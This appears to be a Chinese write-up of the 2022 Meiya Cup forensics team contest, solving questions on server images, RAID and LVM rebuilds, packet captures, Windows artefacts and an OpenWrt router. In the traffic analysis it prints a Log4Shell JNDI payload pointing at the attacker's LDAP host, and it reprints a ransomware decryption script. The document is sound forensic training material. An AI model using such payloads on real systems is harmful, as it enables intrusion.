2022美亚杯团队赛

2022美亚杯团体赛 - XDforensics-Wiki

2022 美亚杯 团体赛AGC部分+资格赛服务器部分 所有服务器部分解题思路_2022美亚杯团体赛复盘-CSDN博客

目录

AGC

1

2   Media Sever挂载

3  ssh登入的看法  PTS

4

5  ssh日志

6

7  查看docker列表

8  查看docker运行

9 建立网站

具体分析

10

11

12  基本镜像存储池 查看内容 重新仿真

13  查看文件所有权

14

15 查看基本储存池快照

16 查看快照内容

21 流量分析 查看url

22  查看参数

23 查看后续内容

方式1

方式2 反汇编木马文件

24

25

26

27

28  分离流量包

29

31

32

33  网上邻居注册表

34

35

36

37

38

39

40

41

42

43

44

raid重组

方法1 虚拟机自动重组

方法2   USF、R-Studio自动识别重组

45  LVM中 CG `pve` 存在多少PE

46   Proxmox用户

47   进入Proxmox web服务 导出虚拟机

48  ubuntu nginx重建网站  查看日志 分析木马

重构网站

49  查看设备登入失败个数 btmp查看

50

51

52 重建邮电系统

53

54

55

56

朗尼

89  查看hostname

90 查看network文件

91  open的配置

92

93

94

95  损失文件在扇区中的查找

106

107

108

109 回复种子--->比特币关键词

110

111

112

113

114

115

116

117

118

119

 120

121

122

123

124

126

127

128

129

130

王景浩

17

18

19  通过加密算法进行解密

20

57 MAC取证

58

59

60

61

62

63  解密MA密码

 64

65  通过 manifest.plist 查看版本

66

67 查看备份密码

68

69  hashcat 爆破itunes backup的参数

70   passware爆破密码

71 查看3D打印内容

72

73  3D打印的文档问题

74

75

76

77  查看 messageid

78

79

80 查看open 获取ip地址

81 配置蓝牙访问mac地址

82

83 挂载备份文件

84

85

86  大疆飞行日志分析

87

88

96 计算存储容量

97

98 查看磁盘标识符

99

100 修复sd卡

101

102

103

104

105


 

团队赛密钥

av?5CAXw;&N`X)6)%B>Y<`Gx[IVq<5F;mAQp]b@ftYpF6v,*88~%wF*CS}.w*7"S(,I[gJE((9cwT@zEh2mY$AK[aZzW&JFR<\FE}RC\Gjx[!ec^GrDne]xK)SuUPMWX

AGC

1

[填空题] 在朗尼手机于2022年9月30日的 ‘WhatsApp’ 对话里,有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 ‘VPN’ 的租金? (以阿拉伯数字回答) (3分)

需要去查看朗尼的手机 所以我们去取证手机

导出音频倒放即可

在线Mp3反向器 - 倒放音频文件

3000

2   Media Sever挂载

[填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)

取证去取media server 内容

解压后挂在MediaServer\e01\sda\sda.E01内容 然后就可以挂在成功了

这里问本地用户成功登入

2022美亚杯团队赛_第1张图片

只有3个成功登入过

3  ssh登入的看法  PTS

就AGC集团网络的流媒体服务器, 有多少个本地用户曾经成功用 ssh 登录过?

2022美亚杯团队赛_第2张图片

这里只要是pts 就是通过ssh登入的

所以这里的用户只有3个

4

就上述的本地用户, 成功通过 ssh 登录过该流媒体服务器多少次?

2022美亚杯团队赛_第3张图片

12次

5  ssh日志

试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ssh:notty 登录该流媒体服务器?

A:iamhacker B:hacking C:hack D:hacker E:以上皆非

这里需要我们查看ssh登入记录 那么就是在 vat/log/auth.log中

但是其实在镜像中log日志都没了

所以我们去看backup压缩包

发现是 C

6

就该流媒体服务器的本地用户, 有一个用户名是 S 开头的, 试找找该用户的姓氏?

这里确实离谱 主要是我们先确定S开头的用户

2022美亚杯团队赛_第4张图片

然后我们需要去数据库中查?为啥知道在数据库。。。可能敏感信息存在数据库里吧

然后我们仿真去看看

2022美亚杯团队赛_第5张图片

感觉应该是这个

直接弘连数据库分析就行了好像

2022美亚杯团队赛_第6张图片

Li

7  查看docker列表

该流媒体服务器是有使用 Docker 容器的,当中包含以下哪个 Docker 镜像?
A. apache2

B. ubuntu

C. centos

D. nginx

E. hello-world

F. 以上皆非

2022美亚杯团队赛_第7张图片

或者直接去仿真查看

docker images

BCDE      

8  查看docker运行

就上述的 Docker 镜像, 哪一个镜像在系统上运行中?
A:apache2 B:ubuntu C:centos D:nginx E:hello-world F:以上皆非

docker ps

2022美亚杯团队赛_第8张图片

就 nginx D

9 建立网站

该流媒体服务器是使用 WordPress 建站的, 就比特币 标题, 有以下的电子邮箱地址曾经留有评论?¶
 A:cn.wordpress.org B:[email protected] C:[email protected] D:[email protected] E:[email protected] F:以上皆非

这里要重新启动网站

首先我们查看一下服务

systemctl  status apache2

systemctl status mysqld

可以发现都是启动的

2022美亚杯团队赛_第9张图片

然后我们查看本地ip

然后去火狐查看

2022美亚杯团队赛_第10张图片

然后我们直接输入目录

wordpress即可访问了

2022美亚杯团队赛_第11张图片

具体分析

这里我们是可以直接访问的

但是为什么访问wordpress呢

我们首先来看看

首先查看apache的配置

cd /etc/apache2

ls

cat apache2.config

2022美亚杯团队赛_第12张图片

这里我们发现include了内容

然后我们去site中查看

2022美亚杯团队赛_第13张图片

发现了网站目录

然后我们就可以去查看一下了

2022美亚杯团队赛_第14张图片

所以这里我们访问一下wordpress

这里可以直接访问 但是我们点比特币的时候 就没有响应 因为他把ip写死在源代码里了

这里有一个方法 就是通过bp来替换

2022美亚杯团队赛_第15张图片

2022美亚杯团队赛_第16张图片

然后进行抓包放包

2022美亚杯团队赛_第17张图片

进来咯这里有两个 肯定藏在数据库里 所以我们去访问看看

sudo su 进入root

mysql -u root

show databases;

use wordpress;

show tables;

这里我们想通过用户名获取邮箱账号 所以我们查看用户信息即可

第二种我们可以去通过网站配置sql信息查看

2022美亚杯团队赛_第18张图片

最终成功获取邮箱

10

10. [单选题]该流媒体服务器里其中一个本地用户是有使用 'calendar' 日历工具的, 日历内曾经提及以下哪个网站? (3分)

A. https://weibo.com

B. http://www.baidu.com

C. https://www.douyin.com

D. https://youku.com

E. https://www.binance.com

F. 以上皆非

2022美亚杯团队赛_第19张图片

E

11

11. [单选题]该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)

A. RAID 0

B. RAIDz2

C. RAIDz3

D. RAID 10

E. RAID 5

F. 以上皆非

这里貌似我们不需要取证

2022美亚杯团队赛_第20张图片

这里我们可以看到是mirror

F

12  基本镜像存储池 查看内容 重新仿真

 该基本镜像存储池里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份?

这里我出现了问题 因为当时仿真只选择了 sda的E01

所以数据不全

这里我们应该需要通过  abcd的E01恢复数据

2022美亚杯团队赛_第21张图片

开始仿真

2022美亚杯团队赛_第22张图片

这个时候 mediao就有东西了

2022美亚杯团队赛_第23张图片

找到咯

这里其实还有地方没确定

我们怎么知道 基本镜像存储池是什么呢

ZFS/ZPool - Ubuntu Wiki

2022美亚杯团队赛_第24张图片

所以我们使用 zpool status命令可以查看

2022美亚杯团队赛_第25张图片

这里确定是在media0 这里

13  查看文件所有权

[填空题] 承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分) root

2022美亚杯团队赛_第26张图片

ls -l

发现是 root

14

[填空题]就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童sq影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM) (2分)

这里结合上面的内容 既然是root那么我们首先在浏览器中没有发现结果 linux只可能是命令了

我们去看root的命令

2022美亚杯团队赛_第27张图片

发现存在 所以我们去搜索一下link.html这个内容是什么

2022美亚杯团队赛_第28张图片

需要切换

发现是url编码了 我们去看看内容

哦吼 找到了

这里我觉得是通过

curl -i -o link.html https://bit.ly/3xyi8b5

这个命令去获取了 sq影片 所以我觉得答案是

百度安全验证但是 这里我们可以发现 这个页面就是百度搜索

所以最后是百度

15 查看基本储存池快照
 

[填空题]该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)

这里就要去搜了

搜一下就可以发现 我们可以通过 zpool history 查看历史命令

我们去看看

2022美亚杯团队赛_第29张图片

这不就出来了

media0/mediastorage@version1

看了wp 原来有更简单的

zfs list -t snapshot

确实更直接

16 查看快照内容

[填空题]就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)

这里我们需要知道存储了多少 那么查看快照 我们只有回档了 我们查一下命令

media0/mediastorage@version1

然后我们去查看

24个

21 流量分析 查看url

[单选题]分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 'GET' 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
A. http://155.137.195.111:8080

B. http://www.w3.org/2003/05/soap-envelope

C. http://61.238.217.108:8000

D. 以上皆非

这里都已经开始分析ip和服务器还有get

要么日志 要么流量分析

这里正好存在检材 所以我们就去看看

155.137.195.111:8080

因为是http的读取

所以我们首先过滤http

2022美亚杯团队赛_第30张图片

然后进行追踪流 查看第一个就是了

2022美亚杯团队赛_第31张图片

22  查看参数

[单选题]IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 'POST' 指令,它在 'HTML Form' 项目的 'uname' 栏所输入的字符串是什么? (1分)

A. root

B. ${jndi:ldap://61.238.217.108:1389/a}

C. application/x-www-form-urlencoded

D. password

简单 找到post

2022美亚杯团队赛_第32张图片

选B

23 查看后续内容

23. [单选题]AGC服务器10.0.66.184收到IP地址61.238.217.108的 'POST' 指令后,它执行了哪些行动? (2分)

A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口

B. 于IP地址61.238.217.108下载了Exploit.class

C. 使用端口49264连接IP地址61.238.217.108发送同步要求

D. 以上皆是

方式1

这里看看tcp追踪流

2022美亚杯团队赛_第33张图片

发现在上一个流后面是跟着这个流

 2022美亚杯团队赛_第34张图片

然后就是命令执行了

2022美亚杯团队赛_第35张图片

这里我们就发现了是通过 49264端口进行执行

还有一种方式

方式2 反汇编木马文件

class通过jd 反汇编

2022美亚杯团队赛_第36张图片

但是不知道为什么出现了 {

答案就是D

24

[填空题]在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)

这里我们知道了 是通过 9001 端口向服务器发起攻击

25

[多选题]AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
A. Accounting

B. Picture

C. Staff

D. Sambashare

E. Retail

这里都问目录了 应该是命令执行了 所以我们看一下

ACE

26

[多选题]入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)

A. 檢视了readme.txt内容

B. 删除了三个档案

C. 删除了一个目录 (Directory)

D. 替档案改名

E. 建立了两个txt档案

这里读一下代码就行了

删除了两个文档

2022美亚杯团队赛_第37张图片

E,D对的对的

27

\27. [单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么? (1分) A

A. cGhvdG9zT0Zyb2NreQ==

B. Finanical.xls

C. readme.txt

D. anonymous

A

28  分离流量包

28. [单选题]承上题,该档案原档的建立日期是什么? (2分)

A. 2022-10-21 08:10:30 (UTC+0)

B. 2022-10-21 16:19:39 (UTC+0)

C. 2022-10-22 08:10:30 (UTC+0)

D. 2022-10-22 14:22:06 (UTC+0)

E. 2022-10-22 16:19:39(UTC+0)

2022美亚杯团队赛_第38张图片

这里问时间咯 我们注意一下 去看一下时区

timedatectl

发现是上海的 所以-8 这里就是 6. 但是没有 那么就无所谓了 直接选 14

D

然后这里还看到一个做法。。。。 确实都没想到我靠。。。

我们可以直接通过 分离流量包获取pdf

foremost AGC_Server_2.pcap

 就可以发现分离出来了pdf和html

可以来尝试一下

29

29. [单选题]承上题,该档案的SHA-256哈希值是什么? (3分)

A. a6eef1... ...27364c

B. 54785c… ...fe86f0

C. 961f2b… ...647d55

D. a00e6c… ...d0eaab

E. 以上皆非

这里好像就要pdf 所以上面我们确实需要提取出来

这里直接算一下就行了

1D53F0FC6E23BFDED5C72C17AB52F4D090FB3175190D921E2DEE2E452D0760A8

E

31

31.[单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)

A. 2022-09-26 14:35:17

B. 2022-09-26 21:35:17

C. 2022-09-27 05:35:17

D. 2022-10-05 03:52:15

E. 2022-10-05 11:52:15

开始分析计算机 我们取证获取看看

这里直接就说UTC-8

所以我们去看我们的时区 发现就是北京 那就没事了 直接开冲

2022-10-05 03:52:15 +0800 CST

火眼取出来不是一样的

名称:安装时间
值:2022-09-27 05:35:17
系统:Windows 10 Pro<1>
删除状态:正常

不知道为啥差这么多 选C

32

 [单选题]AGC-CS计算机里的 'Acrobat DC' 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)

2022美亚杯团队赛_第39张图片有两个 选第一个吧

33  网上邻居注册表

[单选题]AGC-CS计算机里的用户 'Carson' 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)

A. \Users\Carson\NTUSER.DAT

B. \Users\admin\NTUSER.DAT

C. \Windows\System32\config\SYSTEM

D. \Windows\System32\config\SOFTWARE

E. \Windows\System32\config\SECURITY

这里我们首先要知道这个是啥 就是一个网络共享好像

我们可以收到 是通过 \\ip的方式访问 我们去索引看看

2022美亚杯团队赛_第40张图片

然后我们跳转源文件 就可以看到是从哪里解析出来的了

2022美亚杯团队赛_第41张图片

A

34

[单选题]承上题,用户 'Carson' 连接的网络磁盘机的IP地址是什么? (1分)
A. \\192.168.182.134\

B. \\192.168.182.134\photo

C. \\192.168.182.134\share

D. \\192.168.182.134\AGC

E. \\192.168.182.134\AGC photo

C

35

[填空题]分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)

这里我们需要找到家庭住址 有点恼火了

2022美亚杯团队赛_第42张图片

然后就去看 发现了 邮箱里存在着

香港灣仔港灣道28號灣景中心A座45樓C室

36

[填空题]承上题,王景浩使用的信用卡号码最后四位数字是? (1分)

这里我们看到了 6171

37

[填空题]AGC-CS计算机用户 'Carson' 曾经收到一个电邮并通过里面的链结下载了一个可疑的 'Word' 文件,那个档案的档案名是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)

这里其实和邮箱没有关系 主要是从邮件里下载了 东西 所以我们前往下载目录看看

2022美亚杯团队赛_第43张图片

只看到了 一个docx 所以就是这个咯 KEFMUONDOCX

38

38. [单选题]承上题,分析该 'Word' 文件,它的可能用途是? (3分)

A. 访问一个网站

B. 记录键盘操作

C. 把档案加密

D. 改变桌面壁纸

E. 关闭计算机

2022美亚杯团队赛_第44张图片

A

39

[单选题]AGC-CS计算机里有一个名为 'admin' 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)

A. 2022-09-28

B. 2022-09-29

C. 2022-09-30

D. 2022-10-01

E. 以上皆非

2022美亚杯团队赛_第45张图片

看到了上次密码设置时间B

40

[填空题] 黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)

2022美亚杯团队赛_第46张图片

这里看到了 连接时间是这个 20220929204142

41

[填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)

我感觉没有依据

但是这里说是下载的东西

这里我们还是需要通过微步来实现 首先我们能发现一个非常异常的东西 为什么在 download中 会存在一个svchost.exe文件 我们直接丢到微步中看看

42

[填空题]承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 ('Media Access Control' Address - MAC Address) 并存到一个名为 'ip.txt' 的档案。当中 '192.168.182.130' 计算机的MAC地址是什么? (不要输入 ':' 或 '-' ,以大写英文及阿拉伯数字回答) (3分)

需要去王昊的电脑查看

43

[填空题]AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 'admin' 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)

44

[单选题]黑客除了通过 'RDP' 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)

我们去看看还有没有什么远控的东西

2022美亚杯团队赛_第47张图片

发现又下来一个 这个就是远控

raid重组

这里我们看到这个server就是知道是需要通过raid重组实现

所以我们开始进行

方法1 虚拟机自动重组

首先打开火眼仿真

然后通过火眼仿真将三块都放进去 并且放入一个注册的vmdk 虚拟机

2022美亚杯团队赛_第48张图片

然后直接进行开始创建

然后我们首先会在选择界面

2022美亚杯团队赛_第49张图片

我们先进入第一个 然后他就会开始自动恢复数据

2022美亚杯团队赛_第50张图片

然后就会进入一个内核shell 里面啥东西都没有

所以我们直接关闭虚拟机 直接重启

2022美亚杯团队赛_第51张图片

然后再打开虚拟机

2022美亚杯团队赛_第52张图片

进入rescue选项

然后我们就修复完成了

然后他就会自动重启 我们继续选择 rescue选项

他就可以进入系统了        

2022美亚杯团队赛_第53张图片

下面就是进行挂载

2022美亚杯团队赛_第54张图片

然后通过mount 进行挂载 可以发现 swap挂载不上 但是无所谓 我们需要的数据就是root和data 这样就可以实现了

但是这个方法我们无法丢进取证的地方进行识别我们下面介绍其他的

方法2   USF、R-Studio自动识别重组

这里先 直接丢进入

首先看看USF

2022美亚杯团队赛_第55张图片

我们能发现 将三个镜像丢进USF中后 就会直接识别出来agc0  里面包含了我们所需要的

data root swap

所以我们直接导出即可

2022美亚杯团队赛_第56张图片

选择目录进行导出即可 但是我没内存了 导不出了

下面是R-Studio

我们丢进去看看 我们首先要去FTK 进行挂载

不然就会这样

2022美亚杯团队赛_第57张图片

识别不出 所以我们现在去挂载一下

FILE ----> Image Mounting 进行挂载

每一个都按照这个设置进行挂载 然后我们回到 R-Studio

2022美亚杯团队赛_第58张图片

这个时候我们发现 已经实现了重组

2022美亚杯团队赛_第59张图片

然后我们就可以导出镜像了

但是还是要等很久的

1个小时!!!!!要死了

我们开始做题吧

ok取错了 这里设置设置成压缩的了 所以取出来 取证不了 。。。。

我们重新取证 这里需要选择 byte这个

45  LVM中 CG `pve` 存在多少PE

45.[填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) ‘pve’ 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)

 捏吗 这都啥和啥 啊 我们先去了解一下这些是什么东西

LINUX - LVM原理及PV、VG、LV、PE、LE关系图_pg、vg、lv关系图-CSDN博客

2022美亚杯团队赛_第60张图片

我觉得这个图最清楚了
其实我们直接去搜就可以获取命令了

2022美亚杯团队赛_第61张图片

vgdisplay

2022美亚杯团队赛_第62张图片

这里我们能发现 是114147 但是我看了其他师傅的wp

有答案不一样 这里记录一下

一样通过R-Studio打开 然后我们可以在重组后的十六进制文件里找到 PVE字样 然后打开看看

46   Proxmox用户

AGC_Server 里的 Proxmox 虚拟化环境有哪一个用户?


    A:root

    B:VM_admin

    C:sysadmin

    D:acl

    E:tss

 这里我们先要知道 Proxmox是什么东西

然后发现这里不就是 系统吗 所以是linux系统 我们可以那么肯定存在root用户了

但是我们最好还是去看一下 linux中查看用户信息 要么就 /etc/passwd 要么就/etc/shadow

2022美亚杯团队赛_第63张图片

发现存在AE

但是还有一种说法  并且答案和上面不一样 但我觉得下面这个方法是正确的

是可以通过 Proxmox的网站进行访问

但是这里需要的是通过 R-Studio取出来然后仿真的镜像, 第一种貌似无法实现

我们首先将取出来的内容进行取证 然后通过火眼仿真 查看内容

结果发现 火眼无法识别 那么我们选择美亚的吧

美亚取证大师能够识别 所以我们直接通过美亚取证仿真

2022美亚杯团队赛_第64张图片

开始仿真 下面的题目貌似无法直接从取证中获取 所以我们需要通过仿真来实现

这个时候我们就成功进入了 系统

然后我们需要访问Proxmox的web服务 所以我们先需要修改网络

cat /etc/network/interfaces

2022美亚杯团队赛_第65张图片

我们能发现这里使用的是 eno1

我们修改为我们的 ens33 这里推荐直接通过 xshll ftp实现

然后通过 dhclient 我们就可以获取到我们的虚拟机设置的ip了

然后我们去看看能不能访问web服务

这里需要注意 需要加上 https://ip:8006才可以访问 必须要https

2022美亚杯团队赛_第66张图片

这样就访问上去了 然后我们可以开始摸索了 首先这道题就是问我们 用户 我们去看看Users

2022美亚杯团队赛_第67张图片

发现了只存在 root 和 sysadmin 所以我觉得是AC

47   进入Proxmox web服务 导出虚拟机

检视 Proxmox 里的 VM, 编号 111 的主机名是什么?

这里我们就可以去上面发现了

 这里问111的主机名 我们可以去访问一下111的主机

2022美亚杯团队赛_第68张图片

我们点击远程命令执行的时候 下面开始报错了 但是这里我们可以知道了 他的磁盘 是三个这个

2022美亚杯团队赛_第69张图片

这个文件 然后我们去摸索 data磁盘 里面的111 我们导出取证 这里我们发现 他们的大小不一样

raid 不会大小不一样 因为需要均匀分配校验码 所以这里不会再来是raid重组 所以这里我们直接取证,我们认为他是一个系统盘 其他是存储盘

直接取证

这里丢进火眼之后 会发现动态 让我们选择 所以我们选择后他就可以输出linux系统

这里有个坑 我们从取证大师中导出是错误 的 无法进行挂载 我后面是通过 FTP 进行下载 实现挂载

2022美亚杯团队赛_第70张图片

需要有这么多完整的数据才是正确的

这里我们添加 1  的检材

然后添加动态的时候 只需要添加 2 3 即可 4G的不需要

这里火眼又取证失败了

我们直接去美亚仿真吧

然后我们仿真

然后我们查看主机名 hostname命令        

48  ubuntu nginx重建网站  查看日志 分析木马

分析 VM 编号 111 的网页服务器日志, 当中记录了黑客曾向该服务器发出多少次网络攻击?(存疑)

这里我们既然要看服务器这些 肯定就是要先网站重组(其实不需要) 但是还是看看重组吧

放弃火眼取证了  用美亚吧 火眼直接啥都取不出来

2022美亚杯团队赛_第71张图片

我们首先看看用户执行了什么

我们阅读可以发现 这里主要执行命令是两个用户 一个是root 一个就是 systemadmin

所以我们首先看看sysadmin做了什么

2022美亚杯团队赛_第72张图片

能够发现 是对服务器 和 网站进行配置 那我们看看能不能重构网站

重构网站

首先查看服务是不是开启了 首先就是服务器

MYSQL

2022美亚杯团队赛_第73张图片

NGINX

2022美亚杯团队赛_第74张图片

这里服务全部是开启状态 我们现在去看看具体信息

ssh链接需要修改root登入权限 大家记得去百度一下

SSH 登录 Ubuntu 出现错误,拒绝密码:Permission denied,please try again._ubuntu ssh 密码不正确-CSDN博客

我们继续 去查看sysadmin修改过的数据

首先我们查看服务器配置

2022美亚杯团队赛_第75张图片

发现include了 conf.d

我们去看看里面的配置

2022美亚杯团队赛_第76张图片

发现了 这里的目录和网站名称

然后我们将host加入本机

可以去火眼的host编辑器

然后访问

​http://www.agcom.shop/​

2022美亚杯团队赛_第77张图片

这里网站就重建成功

我们现在需要看 日志 就是被打了多少次

在分析网站的时候

2022美亚杯团队赛_第78张图片

出现了日志存放地址 我们去看看

这里我们首先通过前面 知道是通过一个java文件 然后执行命令的

所以我们注意一下这里 然后我们去看看网站是否被上马了

2022美亚杯团队赛_第79张图片

发现有一个exp这个文件 打开后

 我们发现 这里为啥执行了计算器 这里正常网站一个是不需要的 所以我觉得这里有问题

直接上传微步看看

2022美亚杯团队赛_第80张图片

发现是木马了

所以这里就是漏洞程序 所以我们需要注意 exp这个html

我们去搜一下

2022美亚杯团队赛_第81张图片

所以是24个

49  查看设备登入失败个数 btmp查看

[单选题]哪一个IP地址尝试登录'VM' (虚拟机) 编号 '111' 失败次数最多? (1分)


    A:38.242.130.207

    B:218.92.0.206

    C:43.142.93.22

    D:121.202.141.105

    E:61.238.217.108

这里给了选项 我们可以执行命令 查看一下个数

所以我们去看btmp 通过命令

2022美亚杯团队赛_第82张图片

啥都没有 看第二个

看到只有 61 出现了两次 所以是 E

50

[填空题]黑客在入侵 'VM' 编号 '111' 后,打算涂改AGC公司的网页,黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答)

这里我们看到  是用来涂改AGC公司的网页

那么我们就去网站下面看看有没有其他的

2022美亚杯团队赛_第83张图片找到这个了 但是这里没有找到下载这个的地方 所以先跳过

51

[多选题]根据 'VM' 编号 '111' 里的网页服务器 (Web Server) 的设定,访客可从下列哪个网页地址访问这个服务器? (2分)

A. localhost

B. www.ag.com.shop

C. www.agcom.shop

D. agcom.shop

E. www.agcom.com

这个我们已经找到了 C D

52 重建邮电系统

[填空题]黑客曾入侵 'VM' 编号 '111' 里的电邮系统 'Xeams',他登录的时间是? (以unix时间戳回答,格式如:1665049779010) (2分)

这里我们就要开始重建 Xeams

我们先去找一个操作手册 然后访问一下 5272端口就出来了

2022美亚杯团队赛_第84张图片

 这里需要账号密码 还是要去看一下

怎么获取  这里搭建了邮箱 当时在电脑上也获取到了邮箱 我们去看看能不能通过windwos解析出

账号密码

2022美亚杯团队赛_第85张图片

拿到咯 登进去看看

2022美亚杯团队赛_第86张图片

然后去看看文件日志

2022美亚杯团队赛_第87张图片

然后我们可以看到

2022美亚杯团队赛_第88张图片

转换为时间戳即可

但是是错误的 我们应该查找182.239.119.134 理由看下一题

53

黑客在入侵后盗用 AGC 员工电邮户口及冒充 AGC 员工回复了电邮给客户, 发出这封电邮的操作系统及电邮软件是什么?

A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0

B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1

C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1

D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1

E. Windows 10 Pro Outlook 2016

2022美亚杯团队赛_第89张图片

这里存在银行 如果黑客进行写邮件 要么就是恶搞 要么就是骗钱 这里写出了银行卡

所以应该是这个邮件 然后我们去看这个日期的日志

2022美亚杯团队赛_第90张图片

但是这里注意 既然这里记录了ip 所以上一道题是错误的 因为这一道题的ip 对应了repost

里面的 段

选D

54

黑客在 Proxmox 里留下了一个被加密的程序, 在解密后它的 SHA-256 哈希值是什么?

2022美亚杯团队赛_第91张图片

需要解密 我们导出先

我们去日志执行python的地方看看(systemadmin历史命令)

2022美亚杯团队赛_第92张图片

发现到咯 这个东西 勒索

2022美亚杯团队赛_第93张图片

我们来执行一遍

2022美亚杯团队赛_第94张图片

这里 居然是对py进行计算。。。。 我还以为要干嘛呢

55

55 承上题, 分析程序代码, 上述程序的档案名应是什么?

上题的python名

56

于虚拟机 VM 编号 111 里的档案 \srv\samba\share\AGC photo\DSC01139.JPG , 照片中出现的街道名称是
A. 河背街

B. 沙咀道

C. 众安街

D. 香车街

E. 川龙街

 这里我们先去看看这是啥咯

发现加密了

所以我们使用脚本里面的解密方式

import os
from cryptography.fernet import Fernet

files_allfiles2 = []
path2 = os.getcwd()

for root, dirs, files in os.walk(path2):
	if "RANSOM_NOTE.txt" in files:
		files.remove("RANSOM_NOTE.txt")
	if "ransomware-ver-finalv2.1.py" in files:
		files.remove("ransomware-ver-finalv2.1.py")
	if "decrypt-ver-final.py" in files:
		files.remove("decrypt-ver-final.py")
	for file in files:
		filepath = root + "/" + file
		files_allfiles2.append(filepath)

print(files_allfiles2)

with open("/tmp/thekey.key", "rb") as keyread:
    secretkey = keyread.read()

for file2 in files_allfiles2:
    with open(file2, "rb") as unlockfile:
    	contents2 = unlockfile.read()
    decryptedContents = Fernet(secretkey).decrypt(contents2)
    with open(file2, "wb") as unlockfile:
        unlockfile.write(decryptedContents)

解密

2022美亚杯团队赛_第95张图片

C

朗尼

89  查看hostname

89. [单选题]朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)

A. OpenWrt

B. admin

C. root

D. AsusRt

E. DDwrt

这里需要朗尼电脑 我们就可以通过取证

来看到hostname

拿到这个我也很蒙蔽 咋就90M

取证一下把文件识别出来一下

然后我们要去看hostname /upper/etc/config/system

2022美亚杯团队赛_第96张图片

A

90 查看network文件

90. [多选题]以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)

A. LAN地址是 192.168.1.24

B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务

C. WIFI登录密码为'OpenWrt'

D. 提供网络时间协议 (NTP) 服务

E. 时区设置相等于UTC+8

这里我们首先要通过这些内容进行查看

通过查看我们可以发现存在open 所以B应该也是对的

wifi去哪里看呢

还是在这个目录下的 wireless查看

2022美亚杯团队赛_第97张图片

key就是密码 所以是错误的

C

下面这两个可以通过 system查看

2022美亚杯团队赛_第98张图片

然后 这里ntp没有开启

所以答案是CD

91  open的配置

91. [多选题]承上题,'VPN' 服务器的IP地址及端口 (Port) 是什么? (2分)
A. IP地址 61.238.217.108

B. IP地址 192.168.8.1

C. IP地址 103.10.12.106

D. 端口 33248

E. 端口 1194

F. 端口 1701

我们去翻翻看open的内容

2022美亚杯团队赛_第99张图片

2022美亚杯团队赛_第100张图片

AE

92

[填空题]朗尼草莓计算机操作系统设定了一个档案来储存系统的 'log_file' ,档案名称是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (2分)

直接去搜

2022美亚杯团队赛_第101张图片

可以发现是SYSlog

93

93. [单选题]承上题,检视上述的档案,当中有几个IP地址曾经成功登录这个系统的 'VPN' 服务? (3分)

A. 1

B. 2

C. 3

D. 4

E. 0

 我们去看SYSlog日志 可以发现 登入成功存在

Password auth succeeded

所以我们可以进行过滤 而且日志不多可以直接看出来是B

94

94. [单选题]承上题,检视上述的档案,当中有几个IP地址曾经尝试以 'root' 登入装置但因密码错误而不成功? (2分)

A. 2

B. 4

C. 5

D. 6

E. 8

会出现

Bad password attempt for 'root'

所以过滤一下有5个

D

95  损失文件在扇区中的查找

